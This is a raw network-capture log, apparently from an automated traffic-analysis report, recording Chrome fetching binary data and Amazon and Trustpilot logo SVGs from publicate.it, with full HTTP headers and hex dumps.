                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: f4 29 e4 c8 9a 46 ea 79 67 92 34 68 20 49 49 fd 82 e5 20 33 1d 04 3d 0e 5a 09 3a 0c 80 b3 2a 10 4d 51 0e 7c a5 39 d0 2b c0 06 a8 13 c1 25 96 d0 df 05 b1 ca 0d cc 59 64 56 54 91 b1 af 80 9a 5e 7a 8d b4 f5 79 64 1e 85 9d 4b 82 0a ad 02 c8 b2 5f 88 db 79 7b f2 c7 04 c0 35 03 aa bc 41 d2 80 44 72 cc be 92 1c d7 5c 4a ca f8 33 48 1e 02 c5 81 07 0d bf 71 6d 07 3e ff 00 7a 1b e0 2e e3 83 d1 14 e5 c0 57 95 03 3d 06 36 40 cd 73 68 56 b9 59 4a c7 f9 01 5d 49 3a a4 b3 e7 95 37 c9 b7 36 8f ac ca 6a a8 d2 50 93 a5 5e 02 73 5b 4f 03 d2 dc 9e b7 3b 14 52 2f be 80 dc 37 cf 26 05 52 5c 4e 1f 1a bc 82 d5 f1 d5 a0 47 40 db a3 f3 ef 20 5b a2 9f 5f 35 0e 74 1b d8 00 34 2c 57 b6 75 fb 7e 7c b2 a5 1b f3 e7 46 d2 3f df 4e 4d ab d6 92 6f f5 9b 64 55 d7 00 d0 30 7c 9f 6c 40 f3 cd
                                                                                                                                                                                                        Data Ascii: )Fyg4h II 3=Z:*MQ|9+%YdVT^zydK_y{5ADr\J3Hqm>z.W=6@shVYJ]I:76jP^s[O;R/7&R\NG@ [_5t4,Wu~|F?NModU0|l@
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: c1 09 72 f1 72 df 65 a0 e7 41 a5 a0 53 9d a4 ac 2c 4b 2a 4f ce 95 bc f5 47 30 10 ef a7 b4 a6 1b 8c bc ac 0d 26 e5 e4 a0 b6 5f 52 ca c9 91 b2 f2 2e 41 bd 36 a0 5e fd 85 33 6e b0 b5 33 09 1a e2 93 df d6 03 52 e4 cb a9 58 2b f5 4a 2e cf 36 f3 f2 7e 0d 5e 9d 4a 7e 59 22 2b 2b 4f 2e 4f 2e b7 9f 1b f3 c7 55 50 65 6d 9a 7d d8 e8 f9 73 13 56 f1 7a 3b fe df d2 b6 98 1c 21 b1 01 6c 5e c7 dd 09 52 f4 c3 c7 a8 76 de dd 64 16 1d 82 f5 e9 04 8d bd ad f2 4e 9f e3 90 d6 32 d6 ad e3 1f ff 35 29 bc f1 a3 93 89 d5 f0 23 95 0d f4 fa 07 c5 76 24 a6 3b af 19 cf 1a 3d ef 00 5b 04 7a 1d 52 fb 64 83 49 50 d6 52 67 6a bc 33 4e 71 78 12 54 cb 39 5c 27 7d 94 b0 a4 01 64 1a 4e e8 58 1e 84 6d 3c 2a 48 2b f4 28 54 3c d0 eb ae 6d 1a 99 d4 98 ff f8 35 f6 dc aa 93 cd ec 56 b6 09 d9 2b 1c
                                                                                                                                                                                                        Data Ascii: rreAS,K*OG0&_R.A6^3n3RX+J.6~^J~Y"++O.O.UPem}sVz;!l^RvdN25)#v$;=[zRdIPRgj3NqxT9\'}dNXm<*H+(T<m5V+
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: be f2 f4 de ad c5 15 6d 2b 29 0a 29 63 33 c9 7d 27 8f 53 dd 4f 28 86 1c 0e 89 f6 16 56 d1 c7 3b a1 b9 60 1e 09 ba 1c 34 9c 7f f4 3c 59 22 75 ee 33 69 0a 59 3f 92 14 f9 71 49 12 e3 fd 9d a2 95 ce 29 10 f0 31 44 78 64 bc f4 d8 b2 0f b2 74 37 34 19 41 24 c6 c1 38 f0 df 06 e9 bf c8 f8 c6 d2 8c ee d4 33 23 7b e9 60 e1 34 bf ab 0a f1 10 02 4d 4e 83 14 42 9f 61 2d b1 c5 40 63 4b 1d d4 8d 03 52 06 ea c7 48 8e 48 dc 81 f9 5d 0e 24 5f 20 6b e2 71 4a 54 66 a6 5c f5 5c 6c 44 9e 4e fe e0 7a 35 68 4d 3f 40 bc bc df c1 a7 e2 5c 80 54 e5 01 24 32 e1 fe 5c 2f 9b fc f5 02 72 22 b3 f0 2f d4 8b 01 01 e9 35 0a 0a d8 12 88 be 9f a4 5d b7 0c 6b a2 b6 73 d6 89 f9 5b 1c 61 7b 83 53 3a 76 93 29 c9 bf 17 42 19 62 99 be c8 86 db bc 51 70 6b b8 73 07 09 12 da d6 b0 5a f0 88 07 40 ae
                                                                                                                                                                                                        Data Ascii: m+))c3}'SO(V;`4<Y"u3iY?qI)1Dxdt74A$83#{`4MNBa-@cKRHH]$_ kqJTf\\lDNz5hM?@\T$2\/r"/5]ks[a{S:v)BbQpksZ@
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 75 3b 78 34 1f 26 ae 0c d8 b6 b6 5a b2 f9 50 51 a5 b9 9a 3e f8 5e ab f5 6f 6e 78 c7 df b8 61 ec 5e 75 09 3f 48 e3 48 39 69 9f 6d 05 b0 9b 07 a1 8e 8b 38 3d 72 88 f8 78 8a 79 e0 df 48 19 3d a2 c7 15 32 11 46 a9 a2 d6 4b 4d 3e 13 d1 94 20 92 8e d5 53 c9 b1 06 3a 23 3d 89 25 36 76 d7 d8 2f 0f dc db f5 1b e5 48 8a ea 3c 1b dd 38 07 bd 31 52 22 72 61 42 1c 35 4c 63 89 25 99 4b 0e ae 5c 58 d0 5e f9 01 49 f7 39 65 bd bb 25 3d 7e ff 72 cc cf 16 e1 19 2e c0 c0 90 18 92 46 10 ab 48 53 e0 4d 77 b7 a8 b2 d7 e2 df 6f ab 4c 9f b3 72 86 6c d2 dd 18 c9 26 00 2c a1 49 a9 2d 0d 49 ec c1 fc ff 19 af ee 79 09 d6 f6 83 6d 95 11 3c 1e a8 fb a3 a3 e6 3e b3 12 f3 88 9b 10 2d f6 5b 92 a4 c0 86 00 ad 82 c1 23 04 de db 24 ae 12 86 f3 50 ea dc a5 0f 97 bd 42 87 82 d7 b6 fc 4c db 99
                                                                                                                                                                                                        Data Ascii: u;x4&ZPQ>^onxa^u?HH9im8=rxyH=2FKM> S:#=%6v/H<81R"raB5Lc%K\X^I9e%=~r.FHSMwoLrl&,I-Iym<>-[#$PBL
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 09 47 ca 5d 11 ea a5 5e 69 e0 b8 18 0b 1f c4 f8 00 76 f0 d3 16 52 fb 0d d3 f7 4e bc 2b b1 18 07 fc a8 ea 76 fd 60 9b 4e b4 4a 4d c9 58 89 b1 e3 68 a8 8f b1 ec 13 94 22 4b fa d9 b0 44 47 0c 94 23 b3 57 f4 43 9d 60 5d 17 49 8c 1a ff ad 43 40 7a 53 38 c4 a7 47 df b8 a3 b1 db 55 0a 5c 58 54 55 f0 21 f4 d6 f7 f0 b3 85 c1 ca 52 2d 49 9a 89 75 80 08 60 97 4f 28 6f c4 e4 e6 0b 8c 30 de f0 7b fb 8d 96 22 53 b2 d4 07 87 3b fa cd ef ea 72 5e 78 59 bd f1 9d 81 3d d4 2e 08 0f df 2c 85 23 46 9f 00 36 cf 1d 2d 8a f9 8f 7b c8 79 e9 f4 de e0 83 5d 06 6f d9 64 eb f7 e6 7d e5 30 52 32 18 90 f0 c7 82 c4 e6 1d 5f 8d 5e 0c d2 7e 67 9e fe f8 6c d7 3b 88 33 86 27 d9 72 02 50 d6 64 80 27 02 d8 98 7b 1e 81 31 7b cd a6 0e 0c 3f e1 65 b5 f3 dd aa ed 17 57 85 1b 6c c3 bc b8 18 52 c5
                                                                                                                                                                                                        Data Ascii: G]^ivRN+v`NJMXh"KDG#WC`]IC@zS8GU\XTU!R-Iu`O(o0{"S;r^xY=.,#F6-{y]od}0R2_^~gl;3'rPd'{1{?eWlR
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: e1 17 0b d2 fe c8 3f 1a 63 ed 2d 68 e7 4b f1 7a ec c7 30 ae de 95 98 f5 47 e6 6f af 24 7f 85 b9 1f 47 f6 e5 5e 29 bc 57 0b 81 c0 51 ce 9e 48 f1 7f fa 35 c9 29 f6 ec a1 d7 8a e7 b9 75 69 79 03 ad dd 58 0c 47 94 e6 65 ae de ba 81 bb b1 42 85 4f 75 02 46 ee 08 2e 03 34 b0 27 51 af 8f a8 b2 06 8b ad d4 4a 24 4b 08 64 05 7e 95 b4 b3 43 3f 64 f4 74 96 b6 16 a4 25 03 8b b7 f7 06 3b 68 6b 5c 09 9e e3 cf d6 52 f0 7c cb 73 80 3a b6 38 41 c2 97 60 ba 1a b9 9e 6c 58 2e 68 12 18 5f 22 58 86 da 28 5a 93 06 6f 80 de 4e 12 80 69 83 30 b2 60 61 fa 14 4a 4e 8e 3c 18 fc 05 77 d8 e2 35 77 af 13 86 6f 26 06 fd ff 02 8b f2 31 0e c1 26 c1 a3 23 a7 c8 ba fb 8f f1 df 20 9f a0 11 98 06 c0 ce f3 72 75 49 62 d2 c0 bf 8e c8 5e 32 06 e7 4f 18 48 9a af ed dc 37 2e c0 b6 06 0a 47 d7 a6
                                                                                                                                                                                                        Data Ascii: ?c-hKz0Go$G^)WQH5)uiyXGeBOuF.4'QJ$Kd~C?dt%;hk\R|s:8A`lX.h_"X(ZoNi0`aJN<w5wo&1&# ruIb^2OH7.G
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 6f f9 fe 0c c7 3e 83 c7 df df ac 4a eb e7 92 22 7d 1b 9e 75 88 d3 e6 cf c9 5a 89 a4 ba 63 9d 96 38 3f 51 2d da 5c 4d 84 ff 5d 4f dc 53 0f d8 97 f1 22 46 c6 30 3c d7 56 3b 5f d7 4b ee d6 15 50 d4 e0 b1 27 21 c8 bf e3 e6 39 94 f0 87 5f 9d 34 50 17 94 d5 d2 13 ab 76 50 ee db f9 14 d3 16 a8 ed 36 b0 13 85 44 29 fd 5d c8 67 db 21 18 d8 dc c7 23 24 5f b7 9a 8b 8b a0 1a 0f c6 9f d9 23 af f8 5b cf cd fc 59 39 0a 36 48 66 40 7a ce c0 6e 2a 7b 63 8f 5d 2f 00 1b 46 9d 32 00 76 97 cf 33 90 a7 5e a1 84 fd bf 25 b2 45 58 f3 16 08 de e0 3f cc 3d 1a cb 70 63 14 45 5c 5e 67 d6 a7 f1 a8 10 ba e0 4b fc c2 9d 9e 24 47 32 26 be 17 5a 42 1f e2 57 c7 7b 56 a1 cc ec 67 92 a1 d8 cc 46 c9 11 9e 6f 18 dd 78 71 f3 3d 61 b8 78 6d be d7 13 1c 76 aa dd 72 dd 43 50 41 de 87 a3 4b 84 45
                                                                                                                                                                                                        Data Ascii: o>J"}uZc8?Q-\M]OS"F0<V;_KP'!9_4PvP6D)]g!#$_#[Y96Hf@zn*{c]/F2v3^%EX?=pcE\^gK$G2&ZBW{VgFoxq=axmvrCPAKE
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: d4 35 bd 51 f0 d6 e2 56 c1 18 2c 6b 14 5c 64 a1 1d dd 8d 51 39 1b fc c2 ce b1 96 f6 03 9b 67 4f 34 d6 35 ad ae da 78 7f c4 fc 3a 07 4b 6c cf 67 67 8e d5 bd e5 bf 34 24 79 2e 62 7b c7 20 48 21 f3 e7 2c 2c b9 2f c1 e0 f9 fe b0 1b 96 be 6a f9 24 84 8e 2a 3c dc de 72 dc b0 eb 9f bf 4a 27 ed 7e f8 a2 5c 04 b5 3b 42 92 b1 bf 2e a2 e8 bc ed 3d 22 57 a0 de 2c 4c ba 9c 18 d8 9c d6 83 66 db 91 48 ae bc 84 b4 0d 9f c0 12 dc 25 a1 61 17 d2 b9 3f a8 27 e2 89 09 87 42 8e db e6 92 6b fe 8d a4 4e 3d 13 f7 b3 55 c6 ce 15 d1 41 2e 96 b2 bc a7 fa f5 0f 0a 69 fd 67 87 68 77 41 25 1d 47 a8 23 a7 8a 25 d6 2e 0e 80 5c 16 03 7b f0 00 db df 83 ad c3 0c ec 6e af 2f 9e 58 75 ae 50 f0 d9 e1 53 48 83 64 55 bd 1d c1 ee a6 35 f8 1a 36 67 cc 7b ee 73 61 18 3b 10 64 f3 b0 f0 18 4d 8d 31
                                                                                                                                                                                                        Data Ascii: 5QV,k\dQ9gO45x:Klgg4$y.b{ H!,,/j$*<rJ'~\;B.="W,LfH%a?'BkN=UA.ighwA%G#%.\{n/XuPSHdU56g{sa;dM1
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 43 d2 00 4c e3 7a 90 b8 ef f3 1b 31 37 6e 3b 42 1f 61 9b e5 9e a2 4a 2a c7 3b ad cb ab 1b f9 ed bf f6 78 e4 8c d8 76 d9 bd 9b f1 ec 6b 6c 7a 12 5d 30 29 85 0b 60 69 fd 16 a8 90 7f f4 52 c2 ee 2e eb 13 cc 81 df 47 08 dd 45 90 32 8b d0 1f 5c 7e 89 c2 30 40 42 a7 b1 b1 ee ff d5 ce 5f 74 50 88 71 74 f1 2a 38 96 fc 53 36 bd 8f a7 d7 9c b1 3b 2f ec 0d 8c ed 5c 1c 71 ea c0 2b b7 1e 42 8c f1 3f 38 0d 3d 1f 6f ba b8 17 1d 94 55 57 d4 23 5c 6b 46 fd f0 5c 79 5b 54 fb 09 57 22 9c 11 f4 c2 7a b4 eb 71 59 55 9e 2f 2c 68 da df 95 e0 83 c1 f2 99 23 98 2e 7e 4e 9a f5 b6 49 da 37 30 82 2d 0a be e7 2c c4 a4 10 bf 3a aa 17 8f 01 90 d2 d0 22 b1 da f4 84 ac e9 7f 2d e4 90 c1 9b 3a 08 b5 84 c0 0c 07 89 3e 44 a4 d3 23 9a e4 fd 14 53 8f fb 31 28 0f f0 0f c4 61 f7 e4 c1 8d 57 0f
                                                                                                                                                                                                        Data Ascii: CLz17n;BaJ*;xvklz]0)`iR.GE2\~0@B_tPqt*8S6;/\q+B?8=oUW#\kF\y[TW"zqYU/,h#.~NI70-,:"-:>D#S1(aW


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        39192.168.2.549782104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC774OUTGET /images/amazon.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC752INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:18 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 5530
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "159a-620aa1d1d77c8"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gVrfFeochLFwoiROd9%2BwIt%2BkrDkshHL5o6JENsqgr3oq5sS16iNpZIz5PTldA%2Bn5cipnv6ICxzTkTF78JzZULY71keiiPsiLeXRT3r9%2BxR3DYoJyEpDKX9hh4FzMNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615a3cf726a5e-EWR
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC617INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 6e 6f 22 3f 3e 0a 3c 73 76 67 0a 20 20 20 78 6d 6c 6e 73 3a 73 76 67 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 0a 20 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 0a 20 20 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 0a 20 20 20 77 69 64 74 68 3d 22 36 30 33 22 0a 20 20 20 68 65 69 67 68 74 3d 22 31 38 32 22 0a 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 23 32 32 31 66 31
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="603" height="182" style="fill:#221f1
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 2e 30 38 36 30 37 2c 38 2e 31 37 39 36 35 22 0a 20 20 20 20 20 69 64 3d 22 70 61 74 68 38 22 0a 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 23 66 66 39 39 30 30 22 20 2f 3e 0a 20 20 3c 70 61 74 68 0a 20 20 20 20 20 64 3d 22 6d 20 33 38 38 2e 35 35 36 37 38 2c 31 32 35 2e 35 33 36 33 35 20 63 20 2d 34 2e 34 35 36 38 38 2c 2d 35 2e 37 31 35 32 37 20 2d 32 39 2e 35 37 32 36 31 2c 2d 32 2e 37 30 30 33 33 20 2d 34 30 2e 38 34 35 38 35 2c 2d 31 2e 33 36 33 32 37 20 2d 33 2e 34 33 34 34 32 2c 30 2e 34 31 39 34 37 20 2d 33 2e 39 35 38 37 34 2c 2d 32 2e 35 36 39 32 35 20 2d 30 2e 38 36 35 31 37 2c 2d 34 2e 37 31 39 30 35 20 32 30 2e 30 30 33 34 36 2c 2d 31 34 2e 30 37 38 34 34 20 35 32 2e 38 32 36 39 36 2c 2d 31 30 2e 30 31 34 38 33 20 35 36 2e 36 35 34 36
                                                                                                                                                                                                        Data Ascii: .08607,8.17965" id="path8" style="fill:#ff9900" /> <path d="m 388.55678,125.53635 c -4.45688,-5.71527 -29.57261,-2.70033 -40.84585,-1.36327 -3.43442,0.41947 -3.95874,-2.56925 -0.86517,-4.71905 20.00346,-14.07844 52.82696,-10.01483 56.6546
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 38 32 20 63 20 34 2e 35 33 35 35 31 2c 2d 31 32 2e 30 38 35 39 38 20 31 33 2e 30 35 35 39 37 2c 2d 31 37 2e 37 32 32 36 20 32 34 2e 35 33 38 39 36 2c 2d 31 37 2e 37 32 32 36 20 31 31 2e 36 36 36 34 39 2c 30 20 31 38 2e 39 35 34 37 37 2c 35 2e 36 33 36 36 32 20 32 34 2e 31 39 38 31 34 2c 31 37 2e 37 32 32 36 20 34 2e 35 30 39 33 2c 2d 31 32 2e 30 38 35 39 38 20 31 34 2e 37 36 30 30 38 2c 2d 31 37 2e 37 32 32 36 20 32 35 2e 37 34 34 39 35 2c 2d 31 37 2e 37 32 32 36 20 37 2e 38 31 32 36 32 2c 30 20 31 36 2e 33 35 39 33 31 2c 33 2e 32 32 34 36 37 20 32 31 2e 35 37 36 34 36 2c 31 30 2e 34 36 30 35 32 20 35 2e 38 39 38 37 39 2c 38 2e 30 34 38 35 37 20 34 2e 36 39 32 38 31 2c 31 39 2e 37 34 31 32 38 20 34 2e 36 39 32 38 31 2c 32 39 2e 39 39 32 30 38 20 6c 20 2d
                                                                                                                                                                                                        Data Ascii: 82 c 4.53551,-12.08598 13.05597,-17.7226 24.53896,-17.7226 11.66649,0 18.95477,5.63662 24.19814,17.7226 4.5093,-12.08598 14.76008,-17.7226 25.74495,-17.7226 7.81262,0 16.35931,3.22467 21.57646,10.46052 5.89879,8.04857 4.69281,19.74128 4.69281,29.99208 l -
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 39 20 2d 32 2e 30 39 37 33 35 2c 2d 36 2e 36 35 39 30 36 20 2d 36 2e 32 36 35 38 31 2c 2d 39 2e 32 35 34 35 33 20 2d 31 32 2e 31 39 30 38 33 2c 2d 39 2e 32 35 34 35 33 22 0a 20 20 20 20 20 69 64 3d 22 70 61 74 68 31 36 22 20 2f 3e 0a 20 20 3c 70 61 74 68 0a 20 20 20 20 20 64 3d 22 4d 20 35 34 38 2e 30 30 37 36 32 2c 31 30 35 2e 34 35 34 32 34 20 48 20 35 32 39 2e 34 34 36 31 20 63 20 2d 31 2e 38 36 31 34 31 2c 2d 30 2e 31 33 31 30 37 20 2d 33 2e 33 35 35 37 37 2c 2d 31 2e 36 32 35 34 33 20 2d 33 2e 33 35 35 37 37 2c 2d 33 2e 34 36 30 36 31 20 6c 20 2d 30 2e 30 32 36 32 2c 2d 39 35 2e 36 39 31 34 39 20 63 20 30 2e 31 35 37 33 2c 2d 31 2e 37 35 36 35 33 20 31 2e 37 30 34 31 2c 2d 33 2e 31 31 39 38 20 33 2e 35 39 31 37 31 2c 2d 33 2e 31 31 39 38 20 68 20 31
                                                                                                                                                                                                        Data Ascii: 9 -2.09735,-6.65906 -6.26581,-9.25453 -12.19083,-9.25453" id="path16" /> <path d="M 548.00762,105.45424 H 529.4461 c -1.86141,-0.13107 -3.35577,-1.62543 -3.35577,-3.46061 l -0.0262,-95.69149 c 0.1573,-1.75653 1.7041,-3.1198 3.59171,-3.1198 h 1
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC806INData Raw: 31 2c 31 33 2e 35 35 34 30 39 20 2d 31 35 2e 36 37 37 36 38 2c 30 20 2d 32 37 2e 38 39 34 37 31 2c 2d 39 2e 36 37 34 30 31 20 2d 32 37 2e 38 39 34 37 31 2c 2d 32 39 2e 30 34 38 32 34 20 30 2c 2d 31 35 2e 31 32 37 31 33 20 38 2e 32 30 35 38 37 2c 2d 32 35 2e 34 33 30 33 35 20 31 39 2e 38 37 32 33 36 2c 2d 33 30 2e 34 36 33 39 38 20 31 30 2e 31 31 39 37 2c 2d 34 2e 34 35 36 38 38 20 32 34 2e 32 35 30 35 38 2c 2d 35 2e 32 34 33 33 37 20 33 35 2e 30 35 31 39 33 31 2c 2d 36 2e 34 37 35 35 36 20 76 20 2d 32 2e 34 31 31 39 35 20 63 20 30 2c 2d 34 2e 34 33 30 36 36 20 30 2e 33 34 30 38 32 2c 2d 39 2e 36 37 34 30 33 20 2d 32 2e 32 35 34 36 35 2c 2d 31 33 2e 35 30 31 36 37 20 2d 32 2e 32 38 30 38 38 31 2c 2d 33 2e 34 33 34 34 32 20 2d 36 2e 36 33 32 38 36 31 2c 2d
                                                                                                                                                                                                        Data Ascii: 1,13.55409 -15.67768,0 -27.89471,-9.67401 -27.89471,-29.04824 0,-15.12713 8.20587,-25.43035 19.87236,-30.46398 10.1197,-4.45688 24.25058,-5.24337 35.051931,-6.47556 v -2.41195 c 0,-4.43066 0.34082,-9.67403 -2.25465,-13.50167 -2.280881,-3.43442 -6.632861,-


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        40192.168.2.549786104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC780OUTGET /images/trustpilot-1.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC756INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:19 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 4963
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "1363-620aa1d1c5e87"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PH%2FVzsCwlTj8z%2BApSIAc2QmQ5tuQl41JkV4dWvGl7pobDTYQMfSoYzQ5EsBT4mxuLGToT8%2BNRbuOEb3uPbMg%2BSufZQ6NpXzfGnzozWrUgzuu%2BVf0fd%2FVM4Rj70fbsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615a84df54310-EWR
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC613INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 32 33 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 33 20 33 30 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 20 20 20 20 3c 67 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 6e 6f 6e 7a 65 72 6f 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 33 32 2e 31 31 38 20 31 30 2e 36 33 31 68 31 32 2e 33 36 33 76 32 2e 33 30 32 68 2d 34 2e 38 36 38 76 31 32 2e 39 37 33 68 2d 32 2e 36 36 38 56 31 32 2e 39 33 33 68 2d 34 2e 38 34 37 6c 2e 30 32 2d 32 2e 33 30 32 7a 6d 31 31 2e 38 33 33 20 34 2e 32 31 36 68 32 2e 32 38 31 76 32 2e 31 33 39 68 2e 30 34 63 2e 30 38 32 2d 2e 33 30 36
                                                                                                                                                                                                        Data Ascii: <svg width="123" height="30" viewBox="0 0 123 30" xmlns="http://www.w3.org/2000/svg"> <g fill-rule="nonzero" fill="none"> <path d="M32.118 10.631h12.363v2.302h-4.868v12.973h-2.668V12.933h-4.847l.02-2.302zm11.833 4.216h2.281v2.139h.04c.082-.306
